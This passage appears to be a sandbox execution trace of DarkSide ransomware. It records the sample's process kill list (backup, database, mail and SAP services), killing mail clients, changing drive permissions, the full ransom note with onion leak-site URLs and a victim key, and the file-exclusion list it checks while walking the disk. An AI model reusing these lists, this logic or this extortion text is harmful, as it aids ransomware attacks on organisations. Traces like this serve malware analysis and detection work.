(_Str="csrss.exe", _SubStr="VeeamTransportSvc") returned 0x0 [0136.092] wcslen (_String="VeeamTransportSvc") returned 0x11 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="steam") returned 0x0 [0136.092] wcslen (_String="steam") returned 0x5 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="encsvc") returned 0x0 [0136.092] wcslen (_String="encsvc") returned 0x6 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="mydesktopservice") returned 0x0 [0136.092] wcslen (_String="mydesktopservice") returned 0x10 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="outlook") returned 0x0 [0136.092] wcslen (_String="outlook") returned 0x7 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="synctime") returned 0x0 [0136.092] wcslen (_String="synctime") returned 0x8 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="ocssd") returned 0x0 [0136.092] wcslen (_String="ocssd") returned 0x5 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="SAP") returned 0x0 [0136.092] wcslen (_String="SAP") returned 0x3 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="cvfwd") returned 0x0 [0136.092] wcslen (_String="cvfwd") returned 0x5 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="bengien") returned 0x0 [0136.092] wcslen (_String="bengien") returned 0x7 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="vxmon") returned 0x0 [0136.092] wcslen (_String="vxmon") returned 0x5 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="bedbh") returned 0x0 [0136.092] wcslen (_String="bedbh") returned 0x5 [0136.092] wcsstr (_Str="csrss.exe", _SubStr="ocomm") returned 0x0 [0136.093] wcslen (_String="ocomm") returned 0x5 [0136.093] wcsstr (_Str="csrss.exe", _SubStr="ocautoupds") returned 0x0 [0136.093] wcslen (_String="ocautoupds") returned 0xa [0136.093] wcsstr (_Str="csrss.exe", _SubStr="raw_agent_svc") returned 0x0 [0136.093] wcslen (_String="raw_agent_svc") returned 0xd [0136.093] wcsstr (_Str="csrss.exe", _SubStr="oracle") returned 0x0 [0136.093] wcslen (_String="oracle") returned 0x6 [0136.093] wcsstr (_Str="csrss.exe", _SubStr="disk+work") returned 0x0 [0136.093] wcslen (_String="disk+work") returned 0x9 [0136.093] wcsstr (_Str="csrss.exe", _SubStr="powerpnt") returned 0x0 [0136.093] wcslen (_String="powerpnt") returned 0x8 [0136.093] wcsstr (_Str="csrss.exe", _SubStr="saposcol") returned 0x0 [0136.093] wcslen (_String="saposcol") returned 0x8 [0136.093] wcsstr (_Str="csrss.exe", _SubStr="sqbcoreservice") returned 0x0 [0136.093] wcslen (_String="sqbcoreservice") returned 0xe [0136.093] wcsstr (_Str="csrss.exe", _SubStr="sapstartsrv") returned 0x0 [0136.093] wcslen (_String="sapstartsrv") returned 0xb [0136.093] wcsstr (_Str="csrss.exe", _SubStr="beserver") returned 0x0 [0136.093] wcslen (_String="beserver") returned 0x8 [0136.093] wcsstr (_Str="csrss.exe", _SubStr="saphostexec") returned 0x0 [0136.093] wcslen (_String="saphostexec") returned 0xb [0136.093] wcsstr (_Str="csrss.exe", _SubStr="dbeng50") returned 0x0 [0136.093] wcslen (_String="dbeng50") returned 0x7 [0136.093] wcsstr (_Str="csrss.exe", _SubStr="isqlplussvc") returned 0x0 [0136.093] wcslen (_String="isqlplussvc") returned 0xb [0136.093] wcsstr (_Str="csrss.exe", _SubStr="CVODS") returned 0x0 [0136.093] wcslen (_String="CVODS") returned 0x5 [0136.093] _wcslwr (in: _String=0x2dc6660 | out: _String="wininit.exe") returned="wininit.exe" [0136.093] _wcslwr (in: _String=0x2dc68f0 | out: _String="csrss.exe") returned="csrss.exe" [0136.094] _wcslwr (in: _String=0x2dc6b40 | out: _String="winlogon.exe") returned="winlogon.exe" [0136.094] _wcslwr (in: _String=0x2dc6ed8 | out: _String="services.exe") returned="services.exe" [0136.094] _wcslwr (in: _String=0x2dc7130 | out: _String="lsass.exe") returned="lsass.exe" [0136.094] _wcslwr (in: _String=0x2dc7480 | out: _String="lsm.exe") returned="lsm.exe" [0136.094] _wcslwr (in: _String=0x2dc7848 | out: _String="svchost.exe") returned="svchost.exe" [0136.094] _wcslwr (in: _String=0x2dc7ad8 | out: _String="svchost.exe") returned="svchost.exe" [0136.094] _wcslwr (in: _String=0x2dc80e8 | out: _String="svchost.exe") returned="svchost.exe" [0136.094] _wcslwr (in: _String=0x2dc86b8 | out: _String="svchost.exe") returned="svchost.exe" [0136.094] _wcslwr (in: _String=0x2dc9048 | out: _String="svchost.exe") returned="svchost.exe" [0136.094] _wcslwr (in: _String=0x2dc92d8 | out: _String="audiodg.exe") returned="audiodg.exe" [0136.094] _wcslwr (in: _String=0x2dc96e8 | out: _String="svchost.exe") returned="svchost.exe" [0136.094] _wcslwr (in: _String=0x2dc9bb8 | out: _String="svchost.exe") returned="svchost.exe" [0136.094] _wcslwr (in: _String=0x2dc9d88 | out: _String="dwm.exe") returned="dwm.exe" [0136.094] _wcslwr (in: _String=0x2dca610 | out: _String="explorer.exe") returned="explorer.exe" [0136.094] _wcslwr (in: _String=0x2dcaa68 | out: _String="spoolsv.exe") returned="spoolsv.exe" [0136.094] _wcslwr (in: _String=0x2dcaff8 | out: _String="svchost.exe") returned="svchost.exe" [0136.094] _wcslwr (in: _String=0x2dcb388 | out: _String="taskhost.exe") returned="taskhost.exe" [0136.094] _wcslwr (in: _String=0x2dcb5a0 | out: _String="taskeng.exe") returned="taskeng.exe" [0136.094] _wcslwr (in: _String=0x2dcb6f0 | out: _String="governor.exe") returned="governor.exe" [0136.094] _wcslwr (in: _String=0x2dcb848 | out: _String="pockets.exe") returned="pockets.exe" [0136.094] _wcslwr (in: _String=0x2dcb998 | out: _String="countries-attorneys.exe") returned="countries-attorneys.exe" [0136.094] _wcslwr (in: _String=0x2dcbb00 | out: _String="gods.exe") returned="gods.exe" [0136.094] _wcslwr (in: _String=0x2dcbc50 | out: _String="constructed alice trying.exe") returned="constructed alice trying.exe" [0136.094] _wcslwr (in: _String=0x2dcbdc8 | out: _String="st_registration.exe") returned="st_registration.exe" [0136.094] _wcslwr (in: _String=0x2dcbf28 | out: _String="sparc largely.exe") returned="sparc largely.exe" [0136.095] _wcslwr (in: _String=0x2dcc088 | out: _String="routing_another_november.exe") returned="routing_another_november.exe" [0136.095] _wcslwr (in: _String=0x2dcc200 | out: _String="myth.exe") returned="myth.exe" [0136.095] _wcslwr (in: _String=0x2dcc350 | out: _String="happen_gloves_hl.exe") returned="happen_gloves_hl.exe" [0136.095] _wcslwr (in: _String=0x2dcc4b8 | out: _String="forget favors hospital.exe") returned="forget favors hospital.exe" [0136.095] _wcslwr (in: _String=0x2dcc628 | out: _String="connected_grew.exe") returned="connected_grew.exe" [0136.095] _wcslwr (in: _String=0x2dcc788 | out: _String="athletic pastor.exe") returned="athletic pastor.exe" [0136.095] _wcslwr (in: _String=0x2dcc8e8 | out: _String="camping_municipality_scope.exe") returned="camping_municipality_scope.exe" [0136.095] _wcslwr (in: _String=0x2dcca60 | out: _String="handheld.exe") returned="handheld.exe" [0136.095] _wcslwr (in: _String=0x2dccbb8 | out: _String="governmentdiscipline.exe") returned="governmentdiscipline.exe" [0136.095] _wcslwr (in: _String=0x2dccd28 | out: _String="associatedisp.exe") returned="associatedisp.exe" [0136.095] _wcslwr (in: _String=0x2dcce88 | out: _String="federation_rev.exe") returned="federation_rev.exe" [0136.095] _wcslwr (in: _String=0x2dccfe8 | out: _String="swim_welfare_utah.exe") returned="swim_welfare_utah.exe" [0136.095] _wcslwr (in: _String=0x2dcd150 | out: _String="carmen ot.exe") returned="carmen ot.exe" [0136.095] _wcslwr (in: _String=0x2dcd2a8 | out: _String="3dftp.exe") returned="3dftp.exe" [0136.095] _wcslwr (in: _String=0x2dcd3f8 | out: _String="absolutetelnet.exe") returned="absolutetelnet.exe" [0136.095] _wcslwr (in: _String=0x2dcd558 | out: _String="alftp.exe") returned="alftp.exe" [0136.095] _wcslwr (in: _String=0x2dcd6a8 | out: _String="barca.exe") returned="barca.exe" [0136.095] _wcslwr (in: _String=0x2dcd7f8 | out: _String="bitkinex.exe") returned="bitkinex.exe" [0136.095] _wcslwr (in: _String=0x2dcd950 | out: _String="coreftp.exe") returned="coreftp.exe" [0136.095] _wcslwr (in: _String=0x2dcdaa0 | out: _String="far.exe") returned="far.exe" [0136.095] _wcslwr (in: _String=0x2dcdbe8 | out: _String="filezilla.exe") returned="filezilla.exe" [0136.095] _wcslwr (in: _String=0x2dcdd40 | out: _String="flashfxp.exe") returned="flashfxp.exe" [0136.095] _wcslwr (in: _String=0x2dcde98 | out: _String="fling.exe") returned="fling.exe" [0136.095] _wcslwr (in: _String=0x2dcdfe8 | out: _String="foxmailincmail.exe") returned="foxmailincmail.exe" [0136.096] _wcslwr (in: _String=0x2dce148 | out: _String="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0136.096] _wcslwr (in: _String=0x2dce2b0 | out: _String="icq.exe") returned="icq.exe" [0136.096] _wcslwr (in: _String=0x2dce3f8 | out: _String="leechftp.exe") returned="leechftp.exe" [0136.096] _wcslwr (in: _String=0x2dce550 | out: _String="ncftp.exe") returned="ncftp.exe" [0136.096] _wcslwr (in: _String=0x2dce6a0 | out: _String="notepad.exe") returned="notepad.exe" [0136.096] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x314) returned 0x5dc [0136.096] TerminateProcess (hProcess=0x5dc, uExitCode=0x0) returned 1 [0136.097] CloseHandle (hObject=0x5dc) returned 1 [0136.097] _wcslwr (in: _String=0x2dce7f0 | out: _String="operamail.exe") returned="operamail.exe" [0136.097] _wcslwr (in: _String=0x2dce948 | out: _String="outlook.exe") returned="outlook.exe" [0136.097] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x804) returned 0x5dc [0136.097] TerminateProcess (hProcess=0x5dc, uExitCode=0x0) returned 1 [0136.097] CloseHandle (hObject=0x5dc) returned 1 [0136.097] _wcslwr (in: _String=0x2dcea98 | out: _String="pidgin.exe") returned="pidgin.exe" [0136.097] _wcslwr (in: _String=0x2dcebe8 | out: _String="scriptftp.exe") returned="scriptftp.exe" [0136.097] _wcslwr (in: _String=0x2dced40 | out: _String="skype.exe") returned="skype.exe" [0136.097] _wcslwr (in: _String=0x2dcee90 | out: _String="smartftp.exe") returned="smartftp.exe" [0136.097] _wcslwr (in: _String=0x2dcefe8 | out: _String="thunderbird.exe") returned="thunderbird.exe" [0136.097] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x854) returned 0x5dc [0136.098] TerminateProcess (hProcess=0x5dc, uExitCode=0x0) returned 1 [0136.098] CloseHandle (hObject=0x5dc) returned 1 [0136.098] _wcslwr (in: _String=0x2dcf140 | out: _String="trillian.exe") returned="trillian.exe" [0136.098] _wcslwr (in: _String=0x2dcf298 | out: _String="webdrive.exe") returned="webdrive.exe" [0136.098] _wcslwr (in: _String=0x2dcf3f0 | out: _String="whatsapp.exe") returned="whatsapp.exe" [0136.098] _wcslwr (in: _String=0x2dcf548 | out: _String="winscp.exe") returned="winscp.exe" [0136.098] _wcslwr (in: _String=0x2dcf698 | out: _String="yahoomessenger.exe") returned="yahoomessenger.exe" [0136.098] _wcslwr (in: _String=0x2dcf7f8 | out: _String="active-charge.exe") returned="active-charge.exe" [0136.098] _wcslwr (in: _String=0x2dcf958 | out: _String="accupos.exe") returned="accupos.exe" [0136.098] _wcslwr (in: _String=0x2dcfaa8 | out: _String="afr38.exe") returned="afr38.exe" [0136.098] _wcslwr (in: _String=0x2dcfbf8 | out: _String="aldelo.exe") returned="aldelo.exe" [0136.098] _wcslwr (in: _String=0x2dcfd48 | out: _String="ccv_server.exe") returned="ccv_server.exe" [0136.098] _wcslwr (in: _String=0x2dcfea0 | out: _String="centralcreditcard.exe") returned="centralcreditcard.exe" [0136.098] _wcslwr (in: _String=0x2dd0008 | out: _String="creditservice.exe") returned="creditservice.exe" [0136.098] _wcslwr (in: _String=0x2dd0168 | out: _String="edcsvr.exe") returned="edcsvr.exe" [0136.098] _wcslwr (in: _String=0x2dd02b8 | out: _String="fpos.exe") returned="fpos.exe" [0136.098] _wcslwr (in: _String=0x2dd0408 | out: _String="isspos.exe") returned="isspos.exe" [0136.099] _wcslwr (in: _String=0x2dd0558 | out: _String="mxslipstream.exe") returned="mxslipstream.exe" [0136.099] _wcslwr (in: _String=0x2dd06b8 | out: _String="omnipos.exe") returned="omnipos.exe" [0136.099] _wcslwr (in: _String=0x2dd0808 | out: _String="spcwin.exe") returned="spcwin.exe" [0136.099] _wcslwr (in: _String=0x2dd0958 | out: _String="spgagentservice.exe") returned="spgagentservice.exe" [0136.099] _wcslwr (in: _String=0x2dd0ab8 | out: _String="utg2.exe") returned="utg2.exe" [0136.099] _wcslwr (in: _String=0x2dd0c08 | out: _String="peace.exe") returned="peace.exe" [0136.099] _wcslwr (in: _String=0x2dd0d58 | out: _String="bryan.exe") returned="bryan.exe" [0136.099] _wcslwr (in: _String=0x2dd0fe8 | out: _String="wmiprvse.exe") returned="wmiprvse.exe" [0136.099] _wcslwr (in: _String=0x2dd12c0 | out: _String="wmiprvse.exe") returned="wmiprvse.exe" [0136.099] _wcslwr (in: _String=0x2dd1658 | out: _String="taskhost.exe") returned="taskhost.exe" [0136.099] _wcslwr (in: _String=0x2dd1970 | out: _String="cusersgrujadesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe") returned="cusersgrujadesktop06cfe7f5d88e82f7adda6d8333ca8b302debb22904c68a942188be5730e9b3c8.exe" [0136.099] _wcslwr (in: _String=0x2dd1c58 | out: _String="svchost.exe") returned="svchost.exe" [0136.099] _wcslwr (in: _String=0x2dd1ea8 | out: _String="sppsvc.exe") returned="sppsvc.exe" [0136.099] _wcslwr (in: _String=0x2dd2238 | out: _String="svchost.exe") returned="svchost.exe" [0136.099] _wcslwr (in: _String=0x2dd2488 | out: _String="vssvc.exe") returned="vssvc.exe" [0136.099] _wcslwr (in: _String=0x2dd26d8 | out: _String="svchost.exe") returned="svchost.exe" [0136.099] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2dc4d48) returned 1 [0136.099] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5141b0) returned 1 [0136.099] GetLogicalDriveStringsW (in: nBufferLength=0x80, lpBuffer=0x3ff7bc | out: lpBuffer="C:\\") returned 0x4 [0136.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.100] wcscpy (in: _Dest=0x3ff8c4, _Source="C:\\" | out: _Dest="C:\\") returned="C:\\" [0136.100] GetDiskFreeSpaceExW (in: lpDirectoryName="\\\\?\\C:\\", lpFreeBytesAvailableToCaller=0x3ff790, lpTotalNumberOfBytes=0x0, lpTotalNumberOfFreeBytes=0x0 | out: lpFreeBytesAvailableToCaller=0x3ff790, lpTotalNumberOfBytes=0x0, lpTotalNumberOfFreeBytes=0x0) returned 1 [0136.100] GetTickCount () returned 0x11562c9 [0136.100] GetNativeSystemInfo (in: lpSystemInfo=0x3ff76c | out: lpSystemInfo=0x3ff76c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0136.100] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0136.100] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0136.101] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45bcc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e8 [0136.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45e73, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5e4 [0136.104] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45bcc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f0 [0136.104] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45e73, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5ec [0136.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45bcc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f4 [0136.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45e73, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5f8 [0136.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45bcc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5fc [0136.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45e73, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x600 [0136.107] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x2dc4d48 [0136.107] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x2dd4d50 [0136.108] wcscpy (in: _Dest=0x2dc4d48, _Source="\\\\?\\C:\\" | out: _Dest="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0136.108] GetNamedSecurityInfoW () returned 0x0 [0136.108] SetEntriesInAclW () returned 0x0 [0136.108] SetNamedSecurityInfoW () returned 0x0 [0136.333] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5a4308) returned 1 [0136.333] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ff23c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0136.333] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\" (normalized: "c:")) returned 1 [0136.333] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0136.333] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0136.334] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3ff20c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3ff20c*=0xa8f, lpOverlapped=0x0) returned 1 [0136.335] CloseHandle (hObject=0x1c) returned 1 [0136.336] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0136.336] GetFileAttributesW (lpFileName="\\\\?\\C:\\" (normalized: "c:")) returned 0x16 [0136.336] PathAddBackslashW (in: pszPath="\\\\?\\C:\\" | out: pszPath="\\\\?\\C:\\") returned="" [0136.336] wcslen (_String="\\\\?\\C:\\") returned 0x7 [0136.336] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\*", fInfoLevelId=0x0, lpFindFileData=0x3ff46c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff46c) returned 0x4faec0 [0136.336] _wcsicmp (_Str1="$recycle.bin", _Str2="$Recycle.Bin") returned 0 [0136.336] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0136.337] _wcsicmp (_Str1="$recycle.bin", _Str2="Boot") returned -62 [0136.337] wcslen (_String="$recycle.bin") returned 0xc [0136.337] _wcsicmp (_Str1="config.msi", _Str2="Boot") returned 1 [0136.337] wcslen (_String="config.msi") returned 0xa [0136.337] _wcsicmp (_Str1="$windows.~bt", _Str2="Boot") returned -62 [0136.337] wcslen (_String="$windows.~bt") returned 0xc [0136.337] _wcsicmp (_Str1="$windows.~ws", _Str2="Boot") returned -62 [0136.337] wcslen (_String="$windows.~ws") returned 0xc [0136.337] _wcsicmp (_Str1="windows", _Str2="Boot") returned 21 [0136.337] wcslen (_String="windows") returned 0x7 [0136.337] _wcsicmp (_Str1="appdata", _Str2="Boot") returned -1 [0136.337] wcslen (_String="appdata") returned 0x7 [0136.337] _wcsicmp (_Str1="application data", _Str2="Boot") returned -1 [0136.337] wcslen (_String="application data") returned 0x10 [0136.337] _wcsicmp (_Str1="boot", _Str2="Boot") returned 0 [0136.337] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0136.337] _wcsicmp (_Str1="bootmgr", _Str2="README.c06622a1.TXT") returned -16 [0136.337] wcsstr (_Str="bootmgr", _SubStr="README") returned 0x0 [0136.337] _wcsicmp (_Str1="autorun.inf", _Str2="bootmgr") returned -1 [0136.337] wcslen (_String="autorun.inf") returned 0xb [0136.337] _wcsicmp (_Str1="boot.ini", _Str2="bootmgr") returned -63 [0136.337] wcslen (_String="boot.ini") returned 0x8 [0136.337] _wcsicmp (_Str1="bootfont.bin", _Str2="bootmgr") returned -7 [0136.337] wcslen (_String="bootfont.bin") returned 0xc [0136.337] _wcsicmp (_Str1="bootsect.bak", _Str2="bootmgr") returned 6 [0136.337] wcslen (_String="bootsect.bak") returned 0xc [0136.337] _wcsicmp (_Str1="desktop.ini", _Str2="bootmgr") returned 2 [0136.337] wcslen (_String="desktop.ini") returned 0xb [0136.337] _wcsicmp (_Str1="iconcache.db", _Str2="bootmgr") returned 7 [0136.337] wcslen (_String="iconcache.db") returned 0xc [0136.337] _wcsicmp (_Str1="ntldr", _Str2="bootmgr") returned 12 [0136.337] wcslen (_String="ntldr") returned 0x5 [0136.338] _wcsicmp (_Str1="ntuser.dat", _Str2="bootmgr") returned 12 [0136.338] wcslen (_String="ntuser.dat") returned 0xa [0136.338] _wcsicmp (_Str1="ntuser.dat.log", _Str2="bootmgr") returned 12 [0136.338] wcslen (_String="ntuser.dat.log") returned 0xe [0136.338] _wcsicmp (_Str1="ntuser.ini", _Str2="bootmgr") returned 12 [0136.338] wcslen (_String="ntuser.ini") returned 0xa [0136.338] _wcsicmp (_Str1="thumbs.db", _Str2="bootmgr") returned 18 [0136.338] wcslen (_String="thumbs.db") returned 0x9 [0136.338] GetFileAttributesW (lpFileName="\\\\?\\C:\\" (normalized: "c:")) returned 0x16 [0136.338] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x2df4d60 [0136.339] wcscpy (in: _Dest=0x2df4d60, _Source="\\\\?\\C:\\" | out: _Dest="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0136.339] wcslen (_String="\\\\?\\C:\\") returned 0x7 [0136.339] wcscpy (in: _Dest=0x2df4d6e, _Source="bootmgr" | out: _Dest="bootmgr") returned="bootmgr" [0136.339] SetFileAttributesW (lpFileName="\\\\?\\C:\\bootmgr", dwFileAttributes=0x80) returned 1 [0136.339] CreateFileW (lpFileName="\\\\?\\C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.339] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2df4d60) returned 1 [0136.339] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0136.339] _wcsicmp (_Str1="BOOTSECT.BAK", _Str2="README.c06622a1.TXT") returned -16 [0136.339] wcsstr (_Str="BOOTSECT.BAK", _SubStr="README") returned 0x0 [0136.339] _wcsicmp (_Str1="autorun.inf", _Str2="BOOTSECT.BAK") returned -1 [0136.339] wcslen (_String="autorun.inf") returned 0xb [0136.340] _wcsicmp (_Str1="boot.ini", _Str2="BOOTSECT.BAK") returned -69 [0136.340] wcslen (_String="boot.ini") returned 0x8 [0136.340] _wcsicmp (_Str1="bootfont.bin", _Str2="BOOTSECT.BAK") returned -13 [0136.340] wcslen (_String="bootfont.bin") returned 0xc [0136.340] _wcsicmp (_Str1="bootsect.bak", _Str2="BOOTSECT.BAK") returned 0 [0136.340] FindNextFileW (in: hFindFile=0x4faec0, lpFindFileData=0x3ff46c | out: lpFindFileData=0x3ff46c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, 